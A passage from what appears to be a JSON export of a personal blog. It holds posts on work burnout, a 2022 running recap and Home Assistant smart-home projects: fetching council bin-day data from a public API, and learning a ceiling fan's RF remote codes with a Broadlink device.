and I was looking at what I had achieved and being honest, it wasn’t much. Our team didn’t have many clear objectives and Advocacy in general was still in draft mode for what FY23’s objectives were going to be. I was feeling pretty demoralised, and I was starting to feel like I was just spinning my wheels.\nWhen reviewing my Connect with my manager, the feedback was pretty clear that I need to step up my game, and while I’m not on a performance improvement plan, it’s something that could come down the track if I don’t start to show some results.\nNovember was probably my lowest point, but I was still too deep in the hole to see it.\nA holiday and self reflection At the start of December I had a week off, I went up the coast with my wife and kids, plus her extended family. I turned off the work profile on my phone (which disables Teams, email, etc.), and didn’t touch a computer all week (except for turning it on so the kids could watch Netflix).\nWhen I got back to work I realised that I hadn’t been at a PC for a week and I hadn’t missed it, being disconnected hadn’t left me thinking “oh, I need to check my email”, it was just a nice break.\nI started to reflect on that and realised pretty quickly that I was burnt out. I was burnt out on the constant change, I was burnt out on the lack of impact, I was burnt out on the isolation of remote work, and I was burnt out on the lack of direction.\nI was burnt out.\nMoving forward After getting back to work I set about defining a few solid goals to achieve before the end of the year. I got into coding on one of the projects our team had been working on and found myself debugging deep into some Golang code, creating PR’s against one of our products and generally feeling like I was doing something with some impact.\nI had a bit more of a break over the festive season and did some more reflecting on what I want to achieve in 2023. I don’t have solid goals yet, just a sketch out of what I believe I can do, and I’m going to be working on that over the next few weeks.\nBurnout doesn’t go away overnight, and I’m by no means “cured”, I still catch myself staring off into space at times, but I’m starting to feel like I’m on the right track.\nWrapping up I’m not sure if this post will resonate with anyone, but I felt like I needed to get it out there. I’ve been feeling pretty low for the last few months, and I’ve been trying to keep it to myself, but I think it’s time to be open about it.\nDon’t be afraid to ask for help, and don’t be afraid to ask for a break. I’m not saying that you should take a break from work, but I am saying that you should take a break from the things that are causing you stress. If you’re feeling burnt out, take a step back and figure out what’s causing it, and then work out how to fix it.\nBanner Image by Ryan Snaadt.\n", "id": "2023-01-03-burnout" }, { "title": "1500km", "url": "https://www.aaron-powell.com/posts/2023-01-02-1500km/", "date": "Mon, 02 Jan 2023 00:35:02 +0000", "tags": [ "running" ], "description": "The story of my running in 2022", "content": "Well, 1,565km’s to be exact, but who’s really counting (oh right, me, that’s the point of this post!).\nIt’s another year down so I thought I’d share my running journey from 2022 as it was very much a year of milestones for me, not only is 1500km’s the most km’s I’ve done in a single year, I also managed to get PB’s on all races I entered and I was (mostly) injury free.\nThe raw stats As the saying goes, if it’s not on Strava, it didn’t happen, and according to Strava I ran a total of 1565km’s across 176 activities, totalling 129 hours and 17 minutes, with an elevation gain of 12,719 meters.\nLike I mentioned last year Strava is a bit of a pain to get overly specific with, but I now have 12 months of data in Garmin to look at as well. According to this, the largest running month for me was January at 177.7km for the month, followed closely by August at 175.9km. This tracks as in January I was finishing my “run at least 5km a day” which I kept up for ~3 weeks, and August was the final training for City2Surf.\nRaces The big change for 2022 was that races were back. Races are something that I’d missed from the peak pandemic, so I set myself some goals, a sub-95 half marathon and sub-60 City2Surf (which I’d done in 2019, so it was more proof I could do it again).\nFor me, City2Surf was my A race, the one that I was targeting directly, and I ran the SMH and Blackmores half marathons in addition.\nSMH Half Marathon This was a bit of a spur of the moment event for me. Being in May, SMH is early enough that it’s an indicator for City2Surf (and where to adjust training) but also well enough into the year that I’ve had some time to get some fitness baseline setup.\nBut SMH sucks, it’s a really hard race and as much as I enjoy it, I also really hate doing it.\nThe course for SMH is through Sydney CBD, starting at Hyde Park, zig zagging through the CBD before heading out to Pyrmont, turning around, and then at ~15km in the hills start, with about a 30m vertical climb, and then it just goes up and down constantly from there.\nAs I mentioned, this was a spur of the moment event for me. It’s the first of the big Sydney running events in a calendar year, but I wasn’t sure I’d sign up for it. Talking with some running friends I was sure I could do it (and I did a few half marathon distance long runs at the start of 2022), but having not raced for nearly 3 years, I was unsure if I was mentally ready. But I decided to bite the bullet and sign up, best shake off race nerves before City2Surf!\nOne of my friends I run with was running similar pace to me and was targeting a sub-95 time so I thought I should be able to do that - it’s holding a 4:30 min/km pace and my training runs saw me hitting that with reasonable consistency.\nCome race day I went to find my friend, but he’d gotten into the starting pack before me and was near the front, so I did my warm up of a 1km job, followed by some dynamic stretching and sprints at progressively faster pace, then I settled into the back of the starting group. I wasn’t going to run with the 95 pacer anyway, I don’t like running with pacer groups (I prefer to do my own thing), so it wasn’t that much of a bother.\nThe race got underway, I settled myself into a pace/cadence that was felling good for my body - I don’t look at my watch/wearing a timing print-out, I prefer to run what my body feels to be right and if I miss a pace goal, then clearly I wasn’t ready for it. I paced the 100 min pacer around 8km, clearly I’m holding a solid pace above 100 minutes, and then caught the 95 pacer a few km later. This is good, I’m on pace for sub-95 if I’m passing the pacer. I saw my friend pass me on the return, he wasn’t that far ahead so I pushed a bit and caught him, cheered him on and then dropped away - despite all our banter beforehand and him being convinced I’d out run him, he was clearly running stronger than me and I wasn’t going to be able to keep pace.\nAnd then it went to shit.\nAt the 15km mark, after a few km of flat running, you turn sharply and go up, and up, and up. It was clear that I wasn’t prepared for hills and I knew this was going to be a tough finish to the race. I went from a 4:08 min/km pace to a 4:54 min/km over two km’s. Now sure, there’s expected slowdown when you hit hills, but even reviewing the GAP (Gradient Adjusted Pace) I was behind 4:30 which I needed for sub-95.\nWhen you hit 19km you go downhill into Mrs Macquarie’s Chair, before a hairpin turn and heading back up and out. I summoned the last bit of adrenaline I had left, shouted some encouragement to the runners around me who were clearly in the same boat as me, then prepared for the climb… and then I heard a chirpy voice shouting encouragement behind me. A quick look back to confirm, that yep, there’s the 95 min pacer coming up behind me. Shit, I’d left them behind nearly 10km ago and that confirmed just how much I’d dropped pace.\nIt was now or never, I pushed as hard as I could for the final straight, rounded the last corner, crossed the finish line (and stopped my watch, can’t risk overage on the activity!), and sat down, exhausted.\nI did it - 94:09, I broke my 95 goal.\nMy friend came over and congratulated me, he’d run a 92, so I was glad I didn’t stick with him! Then I went to find my family who’d come in to cheer my finish, my youngest was super excited cuz he’d seen Spiderman finish and I’d beaten Spiderman, so I was kind of a big deal!\nIt did take me several days to be able to walk properly again, but I’d gotten my goal and some useful insights on where I was lacking as I looked towards my next race, City2Surf.\nCity2Surf The number one takeaway from SMH was that I wasn’t hill-fit, and that’s something I’d need to work on for City2Surf, because while SMH is a rough finish with the hills, City2Surf is unforgiving the whole way, there’s maybe 2km of flat across the 14km course, everything else is either up or down.\nI rejigged my training plan - I was running four times a week, Wednesday became hills (I mapped a 3.5km loop at my local park that was up and down constantly), Friday would be speed work (I stopped RunLab as I wasn’t finding it valuable anymore), Saturday was parkrun (generally pushing both kids in a pram) and Sunday was a long run (generally around 15km). As City2Surf got closer, I doubled the hill session to run ~7km up and down, ensuring that I was as strong as I could possibly be on the hills.\nOn race day I stuck to the same plan as in 2019, hang to the back of the wave I’m in, rather than try and run in the pack. It’s probably more psychological than anything, but City2Surf is a huge event, 46,000 people ran/jogged/walked it in 2022, and in my wave there was easily several thousand and there’s a large variety of runners there, so by hanging back I hope for the pack to thin a bit and I can find a path through, rather than getting suck behind people who aren’t going at the pace I’m going.\nI found my groove early, there was a lot of people traffic to dodge, but the legs felt good and around the 5km mark, when you hit one of the flattest sections, I knew I was running fast and strong (looking at the analysis, I did a 3:45 min/km!) and then we get to Heartbreak Hill. Heartbreak Hill is the hill of City2Surf, it’s ~1.4km (just under 1 mile) with ~85m elevation gain on a 6% grade and it’s about the midway point. A good rule of thumb is how you feel at the top is how the race will pan out and in 2019 I was done by the top of the hill (I still don’t know how I held on to the sub-60) but this year I crested it and felt good. Sure, my legs were burning but they still felt strong, and I knew this would be a good time, in fact, looking at the GAP for the segment, I ran a 3:59 min/km, which is insane for a hill like that.\nFeeling good I hit the back half of the course confident. I pushed through the next couple of hills, waved to a friend who’d come out to cheer me on, past someone I know from parkrun (who is a strong runner and consistently beats me there), got horribly depressed when you see the finish line only to have to run past it before doubling back (honestly, that’s just mean!) and crossed the finish line with a 57:24.\nThat’s 2 minutes faster than my 2019 PB, so yeah, crushed it.\nBlackmores Half Marathon After doing City2Surf I was talking to other running friends and I kept getting asked if I was going to aim for sub-90 at Blackmores. I generally shrugged it off as not happening, after all, I only just managed to get sub-95 at SMH, and while I ran a pace a City2Surf to achieve it, I couldn’t have kept that up for another 7km.\nBut it nagged at the back of my mind, maybe I could. So I decided to push my training a bit harder, there was about 6 weeks to go, enough time to build a bit more in. I added a 2km tempo run onto the hills session and extended the length of the speed sessions to be longer segments at pace.\nI felt good, so I decided I would go for it as a stretch goal, with sub-95 being my main objective. Also, Blackmores should be easier to do it than SMH, it’s an “easier” course, with a bit of hills at the start of the race, but once you hit the final third it’s dead flat, and while I was now stronger on the hills, I know that on flat I can really push it.\nThen, with about a week to go I felt a twinge in my calf. Shit, I know what this is, it’s the feeling I had last year, I’m on the edge of a calf strain. I decided that I would still run, I’d put in the training, I should be able to hold it together.\nOn race day I ended up a bit later than planned to the start area (extra bathroom stop along the way!) which meant that I wasn’t able to do the warmup I wanted, only a short jog and a few dynamic stretches, before having to get into the starting area, so my injured calf wasn’t warmed up properly. My race plan was to take the first few km easy as they are a bit hilly (you start from Luna Park, run uphill to the Harbour Bridge and then over it, very picturesque) and that’d give my leg a chance to warm up, knowing I could regain time on the final third once we hit the flat.\nOf course I didn’t follow that. My first km was just under 4:30, with the next being 4:11 and a 3:54 3rd km. This explains why at about 10km I knew I’d torn my calf. I momentarily entertained the idea of calling it quits but I’d come this far, only another 11km to go and I can book a physio appointment!\nWith about 5km to go I broke my “no look” rule and snuck a look at my watch, partially because I needed to know how much longer I was likely to suffer for, and I was shocked, I was under the pace I needed to hit sub-90! I could do this, only 20 more minutes. Adrenaline surged and I pushed on, one step at a time.\n87:46. I not only did it, I’d blown past sub-90! I called my wife and kids (who were still in bed) excited but exhausted. I grabbed a drink, headed up to the recovery area and got a massage then booked into the physio for 9am the following day 🤣.\nThe physio confirmed I’d torn my calf. Thankfully it wasn’t a particularly bad one and as the physio said, I got a PB so it was worth it!\nparkrun A key part of my running is parkrun, a free, timed 5km event that happens at parks every Saturday around the world. I try to make it every weekend, even when I’m traveling I’ll look for where the nearest parkrun is (I rode 8km through Copenhagen to do a parkrun once).\nI started the year with North Woolongong parkrun and ran a 20:22, which I found an amusing start to the year. I hit my 250th parkrun in January at my local parkrun, which is a huge milestone.\nIn September we were holidaying in Mudgee and I decided to run the parkrun there. It was a rainy morning and about 4c, so my wife thought I was mad. But, I managed to run my fastest parkrun ever with a 19:19!\nThen, to cap off the year, I finally managed to get a 1st finisher on Christmas Eve in Queenbyane, on what is a very hilly course.\nI doubt I’ll see this kind of “success” in 2023 at parkrun, I’ve set the bar pretty high for myself…\nTraining So I’ve had some pretty big wins in terms of events this year, and that begs the question, what’s changed?\nThe short answer is focus - I’ve trained in a more focused way on specific outcomes and on where I knew I had the biggest shortcomings. Weird that seems to have paid off right! 😅\nMy wife and I alternate workout days, each doing four days per week (we overlap Saturday with both of us at parkrun), and my week looks like this:\nWednesday: Hills. I aim for around 10km when getting to the end of training before tapering for a race Now that races are done for the year, Wednesday is more of a social run with some friends at an easy pace, but we still hit around the 10km mark. Friday: Speed. I was doing RunLab on Friday but ultimately I reached the end of what I felt of was getting out of the program in the middle of the year and started creating my own program. The sessions range from short distance (400m) as hard as I can go, up to 1 mile around threshold pace. With warmup and cool down, this can get over 10km, but that’ll depend on the segment lengths. For this I try and do it on a flat area, and have some parks nearby that are good for that Saturday: parkrun. Since both my wife and I do it, and our kids don’t want to run it, I take the pram, so I consider it a strength training session! Trust me, when you’ve got ~60kg of kids and pram, going up Sydney Park Hill (which is in the middle of our “home” parkrun) and then down again is a good workout through the legs. Sunday: Long, easy run. Ok, maybe I should say “easy”, as I have had a tendency to run it a bit too fast. But still, it’s generally around 15km and I aim to run just what feels good, without any sort of pushing myself. After injuring myself at Blackmores, my physio reiterated that I really should be doing some strength work, and no, pushing the pram or picking up my kids doesn’t count. So, I’ve started hitting the gym. I’ve replaced Friday’s speed session with a gym session, as I don’t really need to do speed work outside of race training, instead I do a program of:\nJog to the gym warmup Leg press Lunges Leg curls Step ups Calf raises Plank Squats Longer jog home And, yes, it seems to be paying off. So I guess that the physio was right… I’ve kept this up for a few months now, so we’ll see what the impact is next year.\nShoes The other major “change” I made this year was shoes. One thing I like about running is that it’s reasonably cheap. You buy a pair of shoes, some workout gear, and that’s your expenses done. I only ever own one pair of shoes at a time and I’ll run them into the ground. Annoyingly at the end of 2021 I had my shoes stolen from out the front of an apartment we were holidaying at. Granted, these shoes had done ~1200km and were ready for retirement, but I was aiming to run the year out in them and crack a fresh pair for 2022. And really, who steals a pair of beat up old runners? The smell alone should have warned the thief off!\nFor the last few years my go-to shoe has been the Adidas Adizero Adios (I’ve run both the 4’s and 5’s), and had a fresh pair of them waiting at home to get me started. I find them a good all round shoe for the kind of running I do. But one of my running friends had a lot of excess shoes (from doing reviews of them), and is the same size as me, so they offered me a few pairs to try out.\nThere are two main pairs that I’ve added to my rotation, Saucony Triumph 19 and Saucony Endorphin Pro v1. The Triumph’s are what I use for my long runs, they have a huge amount of cushioning in them, making them very soft and cushy, ideal for a long distance run at an easy pace. The drawback of them is they are harder to “go fast” in, as they absorb so much in each step that you don’t get the same return on effort as you do in a less padded shoe (I also find they lack much tread, making them very slippery in the rain, but that could be cuz they are a bit warn).\nThe Endorphin Pro’s are the complete opposite, these are racing shoes. They are of the style with a carbon plate through the base of them, making them ultra ridged, and giving you a lot of return momentum for each step. I only tend to crack them out just before a race to get use to them again, the rigidity makes them feel very different through the ankle and it takes time to get use to the change in movement. For all the races I did this year, I wore the Endorphin Pro’s. Have they made a difference? it’s hard to tell, as I don’t have comparable data (not like I also ran the race on the same day in different shoes). Yes, I beat my PB’s in each race, some by considerable margins, but it’s also been several years of progressively increasing running and training, which will have had an impact.\nBut hey, now I’m a shoe snob who has multiple pairs of runners and when I’m going out I select the “right” shoe for the kind of run I’m doing… I guess it was bound to happen 😅.\nConclusion 2022 was good to me as a runner. I really never though I’d be in a position to run a sub-90 half marathon, but I did it and I can see the impacts of proper training schedules. I haven’t gone as far as getting a personalised plan (yet…), but the past few years have helped me learn more about judging paces when running so I can pace myself better, and how to put together a session for myself that meets what I’m trying to achieve.\nI’m not sure what 2023 will bring, I’m currently nursing a sore calf as I strained it a bit chasing some Strava crowns just before New Years (I managed to get them though, so that’s all that matters), so it’ll be a lighter start to the year. I’m also going to be seeing a surgeon about the varicose veins in my right leg, as I’m starting to notice the difference in swelling between them, so that may see me out of action for a bit.\nThe intent is to keep to the three days of running plus one day at the gym, and I hope to target the same three races again, to prove that 2022 wasn’t just a fluke year in running, but for that I’ll have to work out how to fit an extra day of running in.\nSo fingers and toes crossed, and we’ll see what this post looks like in 12 months time.\n", "id": "2023-01-02-1500km" }, { "title": "Building a Smart Home - Part 5 Bin Day", "url": "https://www.aaron-powell.com/posts/2022-11-07-building-a-smart-home---part-5-bin-day/", "date": "Mon, 07 Nov 2022 05:43:39 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "What day do the bins go out? What bins are we putting out this week?", "content": "Where I live, we have three bins that we can put out, depending on the week, red for household rubbish, yellow for mixed recycling and green for garden waste. The red bin goes out each week, but the yellow and green alternate every other week, so you need to know which one it is that week and like a lot of people, I never know which week it is, so I sneakily wait until my neighbours put their bins out and then I put mine out, following their colour choices!\nBut really, this is the kind of quality-of-life improvement that I should be able to solve with a smart home, so I decided to add it.\nGetting the data into Home Assistant The first step is to get the data into Home Assistant. Thankfully, HA has a calendar feature, so it’s just a matter of having something that goes into that feed and then we should be all sorted right?\nMy friend Tatham pointed me to Waste Collection Schedule, a custom component for Home Assistant that does exactly what I need. Well, it would if my council was there… No biggie, I’ll just add it myself.\nAdding a new council The first step is to find a feed for your local council that has the data available. I live in the Inner West Council and they have a waste calendar on their website, which you can pop in your address and get a display like this:\nGreat, it’s a calendar, or at least providing data that can be mapped to a calendar, all I need to do now is find the endpoint that that’s calling and I’m all set. I set about digging through how it worked and figured the best place to start was the network tab in my browser:\nOh dear… It’s an ASMX web service, which is something from old-school ASP.Net WebForms days, which I haven’t used in a long time. I’m not sure if it’s still a thing, and it’s a HTTP POST, so it’s going to be a bit tricky to break down, but let’s try anyway. We’ll start with the payload:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 { "schedulerInfo": { "ViewStart": "/Date(1667052000000)/", "ViewEnd": "/Date(1670076000000)/", "EnableDescriptionField": true, "MinutesPerRow": 30, "TimeZoneOffset": 36000000, "VisibleAppointmentsPerDay": 2, "UpdateMode": 0, "moduleID": 58152, "userID": 0, "filterPermissions": 6, "filterGroups": "", "filterApptTypes": "" } } Oh dear… ASP.Net serialized DateTime strings, this just gets better… Let’s check out the response:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 { "d": [ { "__type": "Telerik.Web.UI.AppointmentData", "ID": 752, "EncodedID": "/wEC8AXS5ORUZvoJJiHck83LcbtXaRd/GhDgLBkE78COC0wM0g==", "Start": "/Date(1584540000000)/", "End": "/Date(1584626400000)/", "Subject": "Garbage Bin", "Description": "Thursday by 4.30pm", "RecurrenceState": 1, "RecurrenceParentID": null, "EncodedRecurrenceParentID": null, "RecurrenceRule": "DTSTART:20200318T140000Z\\r\\nDTEND:20200319T140000Z\\r\\nRRULE:FREQ=WEEKLY;INTERVAL=1;BYDAY=TH\\r\\n", "Visible": false, "TimeZoneID": "AUS Eastern Standard Time", "Resources": [ { "__type": "Telerik.Web.UI.AppointmentData", "ID": 752, "EncodedID": "/wEC8AXS5ORUZvoJJiHck83LcbtXaRd/GhDgLBkE78COC0wM0g==", "Start": "/Date(1584540000000)/", "End": "/Date(1584626400000)/", "Subject": "Garbage Bin", "Description": "Thursday by 4.30pm", "RecurrenceState": 1, "RecurrenceParentID": null, "EncodedRecurrenceParentID": null, "RecurrenceRule": "DTSTART:20200318T140000Z\\r\\nDTEND:20200319T140000Z\\r\\nRRULE:FREQ=WEEKLY;INTERVAL=1;BYDAY=TH\\r\\n", "Visible": false, "TimeZoneID": "AUS Eastern Standard Time", "Resources": [ { "__type": "Telerik.Web.UI.ResourceData", "Key": 385, "Text": "Garbage Bin (red lid) - MarrZone15B", "Type": "AppointmentTypeID", "Available": true, "EncodedKey": "/wECgQO8KfWqRezwxWlACrW+iXp1yPOARWUInQEsFugq6PPmWA==", "Attributes": { "name": "Garbage Bin (red lid) - MarrZone15B", "backcolour": "#EE0031", "bordercolour": "" } }, { "__type": "Telerik.Web.UI.ResourceData", "Key": 3, "Text": "Public", "Type": "PrivacyID", "Available": true, "EncodedKey": "/wELKYwBQ01Eb3ROZXQuQ29tbW9uLmVjQ2FsZW5kYXIuQ29tbW9uLkVudW1lcmF0aW9ucytBcHBvaW50bWVudFByaXZhY3ksIENNRG90TmV0LkNvbW1vbiwgVmVyc2lvbj0xMS41LjE1LjU2LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPW51bGwDHumVwtOrf2dqNRWC26d+4JZSY0Owz4D1NkVQi9COlYk=", "Attributes": {} }, { "__type": "Telerik.Web.UI.ResourceData", "Key": 2, "Text": "Implementation Staff", "Type": "People", "Available": true, "EncodedKey": "/wECAr6LF7CwU/mH1D0Fnnna3lyFqUBUtQQ7fRbNCKf+z84Q", "Attributes": { "strFirstName": "Implementation", "strLastName": "Staff" } } ], "Attributes": { "PrivacyID": "3", "tt_location": "", "UserName": "Implementation Staff", "tt_apttype": "Garbage Bin (red lid) - MarrZone15B", "tt_subject": "Garbage Bin", "OrganiserUsers": ",", "AllowDelete": "False", "AllowEdit": "False", "tt_aptprivacy": "3", "AppointmentTypeID": "385", "ViewerGroups": "", "ExternalURLOpenNewWindow": "False", "OrganiserGroups": "", "AttendeeUsers": "", "ExternalURL": "", "AttendeeGroups": "", "Location": "", "UserID": "2", "ViewerUsers": "", "tt_description": "Thursday by 4.30pm", "SyncWithExchange": "False", "Title": "Garbage Bin" }, "Reminders": [] } // snip OH DEAR… I’ve truncated the response here (it’s over 1000 lines!) and having spent some time going through it, it’s not something I could figure out (this first record start/end date is back in 2020 from what I can deserialize!). Which isn’t that surprising, the data is designed to be used by the Telerik Calendar control (from what I can determine), so it’s really only designed for use within that control.\nI spend a few evenings trying to make sense of the data structures in the JSON payload, to work out what I can change in the POST body to maybe get more useful data, but it was feeling like a mostly pointless effort… it’s time for a new approach.\nAdding a new council - take two Since the website isn’t going to be much use, it’s time to rethink the strategy for how I can get the data. Some web searching and digging through the council website (yes, I read a lot of the council website!) was leading my nowhere, until I re-read the original waste calendar and noticed that there’s an app. First off - why do I need an app for my local council, but I digress…\nIf I can get the waste schedule on the mobile app, it’s going to have an API that’s easier for me to parse. I installed the app on my phone and now it’s time to work out what it’s doing. This is something I’ve done in the past using Telerik Fiddler, basically what you use Fiddler on your computer as a proxy, configure your mobile to use your computer as the proxy and then monitor the network traffic (here’s a guide from Telerik).\nFor some reason I couldn’t get the root certificate installed, so I wasn’t seeing any of the traffic contents, but I was seeing the routes it was hitting and what I saw was a bunch of requests to https://marrickville.waste-info.com.au. Unfortunately, this is a CMS that I don’t have the login details for, so it was feeling like a dead end again.\nI decided to have a poke around some of the other Australian council implementations in the HACS component when I stumbled into one that looked interesting, it was hitting a waste-info.com.au address too. It wasn’t marrickville, but it was still on there, so maybe this CMS is something I can figure out by going through other implementations.\nThrough browsing the code, it seemed like the data is gained by building a request across a series of other endpoints, first we get the suburb ID from the localities, then we get the street ID, and then a property ID before getting the details for the property! Using the browser, I tested following each endpoint and eventually I got a to:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 { "collection_day": 4, "collection_day_2": null, "zone": "zone 15", "shs": null, "collections": [ { "id": 19, "bin_type": "recycle", "recurrence": "fortnightly", "collection_day": 5, "next_collection_date": "2022-11-18" }, { "id": 20, "bin_type": "organic", "recurrence": "fortnightly", "collection_day": 5, "next_collection_date": "2022-11-11" } ] } Success!\nI copied the reference implementation, tested it locally and sent a PR, so now Inner West Council has been added!\nAdding to Home Assistant Now that the component supports my location (I manually added the Python file while I waited for the PR to merge in), it was time to add it to my Home Assistant dashboard.\nThat’s what I display on the dashboard. I got the card idea from Tatham and it’s using the https://github.com/thomasloven/lovelace-template-entity-row custom card.\nHere’s the YAML for the card:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 type: entities entities: - type: custom:template-entity-row entity: sensor.next_collection name: "{{ states.sensor.next_collection.state }}" state: |- {% set days_to = state_attr('sensor.next_collection', 'daysTo') %} {% if days_to == 0 %} Today {% elif days_to == 1 %} Out Tonight {% elif days_to <= 7 %} {{ (now() + timedelta(days = days_to)).strftime('%A') }} {% else %} in {{days_to}} days {% endif %} active: "{{ states.sensor.next_collection.attributes.daysTo <= 1 }}" icon: mdi:trash-can-outline - entity: sensor.next_garden_collection type: custom:template-entity-row name: Green bin condition: "{{ states.sensor.next_garden_collection.attributes.daysTo <= 7 }}" - entity: sensor.next_recycling_collection type: custom:template-entity-row name: Yellow condition: "{{ states.sensor.next_recycling_collection.attributes.daysTo <= 7 }}" - entity: sensor.next_rubbish_collection type: custom:template-entity-row name: Red bin theme: minimalist-desktop The top is a template that looks works out how long is left and shows a friendly description for when the next collection is, and then I show more details such as which bins there are.\nI’m also using a custom sensor for next_collection which computes from the calendar info:\n1 2 3 4 5 - platform: waste_collection_schedule name: next_collection add_days_to: true details_format: generic value_template: '{{value.types | join(", ")}}' Automations I currently have a single automation that does a broadcast message the day that the bins are due to go out:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 - id: "bin_day" alias: "Reminder: Bins" description: "" trigger: - platform: time at: 08:00:00 condition: - condition: time weekday: - thu action: - service: tts.google_translate_say data: entity_id: media_player.nestaudio0935 message: Today's bins are {{ states.sensor.next_collection.state }} mode: single I should probably update the automation to use something from the HACS component rather than hard-coding thu as the day, but that’ll come if they change my day of pickup.\nI’ve contemplated having something that does an additional reminder if the bins aren’t put out in time, maybe have some presence sensor on the bin and check their location, but I’m not sure if that’s worth the effort, plus this was more to know if it’s yellow or green bin day, not to remind me to put them out (I’m pretty good on that front).\nConclusion I’m pretty happy with how this turned out, it was a fun to do some reverse engineering of the mobile app and figure out how to get the data. I’m also happy that I was able to contribute to the HACS component, so hopefully it’ll be useful to others.\nI think there’s more I could do from a dashboard level to make it more useful, but I’m happy with what I’ve got for now.\nIf you’re doing something similar, I’d love to hear about it, so please let me know in the comments!\n", "id": "2022-11-07-building-a-smart-home---part-5-bin-day" }, { "title": "Building a Smart Home - Part 4 Ceiling Fans", "url": "https://www.aaron-powell.com/posts/2022-10-24-building-a-smart-home-part-4-ceiling-fans/", "date": "Mon, 24 Oct 2022 04:25:19 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "It's starting to get warm in Sydney, let's get the ceiling fans working with Home Assistant", "content": "When we designed our new home, we decided to add ceiling fans to each of the bedrooms, mostly because, while we have a HVAC system in place that is ducted throughout the house, sometimes you just want some basic air movement in a room, especially when it’s humid but not hot, and a HVAC is a lot more expensive to run than a ceiling fan.\nBut, ceiling fans tend to be pretty dumb, and I wanted to look at how to integrate them into my smart home, so let’s take a look at that today. We installed fans from Lucci Air (I’m not sure the exact model) and they have a remote control, so I’ll be looking at that style of fan. If you’ve got something else, maybe some of the ideas here will resonate, but I can’t guarantee it.\nBut first…\nCeiling fans are great example of terrible UX In the first post of this series I brought up the topic of Norman Doors, a term used to describe something that doesn’t work the way you’d expect it, and for me, they are the perfect example of how something can be wrong in a smart home.\nTake the remote controlled ceiling fan. I have a switch on the wall that when I flip it, the state of the light changes. Great, that’s to be expected. And I have a remote that I can use while laying in bed and way to turn the fan on. Again, great… except it’s not.\nIt turns out that these fans (and we had a different Lucci module at the place we rented) are a broken UX design. You see, the switch on the wall isn’t changing the state of the light per se, it’s changing the power state of the circuit, and it just so happens that the fan remembers it’s last state (and the default last state when they were installed is “light is on”). So, if I flip the switch the circuit either has power or doesn’t, and when it has power, the remote can be used to control the fan speed or turn the light off, but when it doesn’t have power, the remote can’t do anything. This manifested itself as a problem in the rental as we’d go to bed, but then want the fan on in the middle of the night, but to do that you flip the switch, light up the room and then quickly hit the “turn light off” button… hopefully without waking the other sleeping person in the room.\nSee, broken UX.\nSo you can address this by removing the switch all together and now it’s just remote controlled, but again, you’ve broken your UX. When someone walks into the room they expect a switch, but it’s not visible, and now you’re left explaining “so, you have to find the remote first, then use that to…” and invariably, one of the kids has hidden the remote.\nThis is a perfect example of everything that can go wrong when you try to make something “smart”. Sure, a remote isn’t a “smart home device” but in this case it’s filling the role and doing so in a way that means you have to constantly “train” people on how to use a room, which is not what you should want.\nOk, complaining done, back to the blog post.\nCeiling fan remote control Given that we have a remote that is used to control the fan functions, it stands to reason that it’s using some signal to communicate with the fan, and that signal is probably using some sort of RF protocol (I’m not sure what frequency this one uses, but knowing it is not required for the solution). And if it’s something being broadcast, well, we can simulate that broadcast right?\nFor that, I decided to use the Broadlink RM4 Pro, which is capable of broadcasting RF and IR signals. I was already using one of these at the rental to blast IR as the reverse cycle AC unit (as I couldn’t be bother replacing the batteries 🤣), so it seemed like a decent enough starting point. Also, there’s a Broadlink integration for Home Assistant which makes it easy to control the device. And for a bonus, the Broadlink device works on local control, so you don’t need to have it connected to the internet to use it.\nOnce the device was provisioned and integrated into Home Assistant, it was ready to get going.\nTeaching the Broadlink As the RM4 is an RF blaster and doesn’t know anything about my fan, I need to train it up, and thankfully, that’s something we can do from Home Assistant.\nNavigate to Developer Tools -> Services and from the service options, you’ll find a remote.learn_command service to execute. This will set the device into learning mode and it’ll pickup any signals we send to it:\n1 2 3 4 5 6 7 service: remote.learn_command data: device: parents_fan command: light command_type: rf target: entity_id: remote.broadlink_rm4_pro The fields of relevance here are:\ndevice - This is the name of the device (aka remote) we’re teaching the Broadlink about. This is just a name, so you can call it whatever you want, but it’s a good idea to make it descriptive. command - This is the name of the command we’re teaching the Broadlink about. This is also just a name, but again, it’s a good idea to make it descriptive. entity_id - This is the Home Assistant entity ID of the Broadlink device we’re teaching. Click the Call Service button and the device will start listening (the indicator light will turn orange), and now we’re ready to go.\nNote: The Call Service button will turn green after a few seconds, but I didn’t find I’d need to wait for it.\nWhile the device is in listening mode, press the button on the remote you want to teach (I found I’d have to hold it down for ~10 seconds), and then when released the indicator light will go off, then turn back on as orange, indicating it’s in learning mode again (or still… I’m not sure). Once it’s back to orange, press the button on the remote again, this time you don’t have to do a long press, the indicator light will turn off, and your remote code is learnt.\nIf you want to verify this, open the your file editor extension (VS Code or File Editor) and navigate to the .storage folder. In there, you’ll find a file named broadlink_remote_<id>_codes. If you open it you’ll see this:\n1 2 3 4 5 6 7 8 9 10 { "version": 1, "minor_version": 1, "key": "broadlink_remote_<id>_codes", "data": { "parents_fan": { "light": "<some long code here>" } } } This is where you’ll find the commands that have been learnt, and is a handy reference if you’re like me and forget what they are called.\nRepeat the above steps for each of the buttons on the remote you want to learn.\nTesting a command Once you’ve learnt a command, you can test it by executing the remote.send_command service:\n1 2 3 4 5 6 service: remote.send_command data: device: parents_fan command: light target: entity_id: remote.broadlink_rm4_pro We have a light that goes on and off, woo!\nMaking our fan With the commands learnt, it’s time to make a fan in Home Assistant that we can control, but since this is going to be a completely virtual fan, we have no physical indicators of state, I’m going to create some helpers to track state for us.\n1 2 3 4 5 6 7 8 9 10 11 12 input_boolean: parents_fan_state: name: "Parents Bedroom: Fan state" icon: mdi:fan input_number: parents_fan_speed: name: Parents fan speed icon: mdi:fan step: 1 min: 0 max: 